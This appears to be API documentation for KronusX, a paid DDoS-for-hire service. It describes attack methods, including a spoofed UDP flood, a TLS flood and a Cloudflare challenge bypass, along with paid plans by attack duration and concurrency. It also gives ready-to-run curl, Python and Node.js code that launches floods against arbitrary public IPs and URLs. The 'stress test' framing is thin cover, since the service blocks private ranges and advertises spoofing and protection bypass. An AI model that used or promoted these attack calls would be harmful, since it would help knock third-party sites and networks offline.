Resources / Documentation

API Documentation

Full reference for the KronusX REST API.

On this page
Authentication Base URL GET /methods POST /attack GET /account GET /plans Error codes Rate limits Examples

Authentication

All API requests require an API key. Pass it via the X-API-Key header or the key query parameter. You can find your API key on the API Keys page.

Header # Recommended — header auth curl https://kronusx.xyz/api/v1/methods \ -H "X-API-Key: YOUR_API_KEY" # Alternative — query param curl https://kronusx.xyz/api/v1/methods?key=YOUR_API_KEY
API access is available on Expert and Enterprise plans only. Lower plans will receive a 403 response.

Base URL

All endpoints are relative to:

https://kronusx.xyz/api/v1

GET /methods

GET/api/v1/methods

Returns all available attack methods with metadata including whether IP or URL targets are accepted.

Request curl https://kronusx.xyz/api/v1/methods \ -H "X-API-Key: YOUR_API_KEY"
Response 200 { "methods": { "udp": { "description": "High GBPS Spoofed UDP Flood", "ipAllowed": true, "urlAllowed": false }, "tls": { "description": "TLS Flood For Generic & CF Sites", "ipAllowed": false, "urlAllowed": true }, "browser": { "description": "CF UAM & Captcha Bypass", "ipAllowed": false, "urlAllowed": true } } }

POST /attack

POST/api/v1/attack

Launches a stress test against the specified target. Send a JSON body with your attack parameters.

Request body

Field Type Required Description
target string Yes IP address or URL depending on method
port integer Yes Target port (1–65535)
duration integer Yes Seconds (30–500 Expert, 30–600 Enterprise)
method string Yes Method name from /methods
Request curl -X POST https://kronusx.xyz/api/v1/attack \ -H "X-API-Key: YOUR_API_KEY" \ -H "Content-Type: application/json" \ -d '{ "target": "1.2.3.4", "port": 80, "duration": 120, "method": "udp" }'
Response 200 { "success": true, "attack": { "target": "1.2.3.4", "port": 80, "duration": 120, "method": "udp", "timestamp": 1750600000 } }
Private and reserved IP ranges (10.x, 172.16-31.x, 192.168.x, 127.x, etc.) are blocked and will return 400.

GET /account

GET/api/v1/account

Returns your account info, current plan, and plan limits.

Response 200 { "username": "yourname", "plan": "expert", "limits": { "max_duration": 500, "concurrents": 8, "methods": "all" }, "rate_limit": 300 }

GET /plans

GET/api/v1/plans

Public endpoint — no API key required. Returns all available plan tiers and their limits.

Response 200 { "plans": { "basic": { "price": 45, "max_duration": 200, "concurrents": 2, "api_access": false }, "pro": { "price": 95, "max_duration": 325, "concurrents": 4, "api_access": false }, "expert": { "price": 199, "max_duration": 500, "concurrents": 8, "api_access": true }, "enterprise": { "price": null, "max_duration": 600, "concurrents": 16, "api_access": true } } }

Error codes

Code Meaning
400 Bad request — missing or invalid parameters
401 Invalid or missing API key
403 Plan does not include API access (Expert+ required)
404 Unknown endpoint
429 Rate limit exceeded — check Retry-After header
502 Upstream error — attack backend unreachable

All errors return JSON with an error field:

{ "error": "Missing or invalid API key" }

Rate limits

API requests are rate-limited per minute based on your plan. Exceeding the limit returns 429 with a Retry-After header.

Plan Requests/min Max duration Concurrent slots
Expert 300 500s 8
Enterprise Unlimited 600s 16

Code examples

Python

Python import requests API_KEY = "your_api_key_here" BASE = "https://kronusx.xyz/api/v1" HEADERS = {"X-API-Key": API_KEY} # List methods methods = requests.get(f"{BASE}/methods", headers=HEADERS).json() # Launch attack attack = requests.post(f"{BASE}/attack", headers=HEADERS, json={ "target": "1.2.3.4", "port": 80, "duration": 120, "method": "udp" }).json() print(attack)

JavaScript (Node.js)

Node.js const API_KEY = "your_api_key_here"; const BASE = "https://kronusx.xyz/api/v1"; const res = await fetch(`${BASE}/attack`, { method: "POST", headers: { "Content-Type": "application/json", "X-API-Key": API_KEY }, body: JSON.stringify({ target: "https://example.com", port: 443, duration: 60, method: "tls" }) }); console.log(await res.json());

cURL

Shell # Layer 4 — UDP flood curl -X POST https://kronusx.xyz/api/v1/attack \ -H "X-API-Key: YOUR_API_KEY" \ -H "Content-Type: application/json" \ -d '{"target":"1.2.3.4","port":80,"duration":60,"method":"udp"}' # Layer 7 — TLS flood curl -X POST https://kronusx.xyz/api/v1/attack \ -H "X-API-Key: YOUR_API_KEY" \ -H "Content-Type: application/json" \ -d '{"target":"https://example.com","port":443,"duration":120,"method":"tls"}' # Check account limits curl https://kronusx.xyz/api/v1/account \ -H "X-API-Key: YOUR_API_KEY"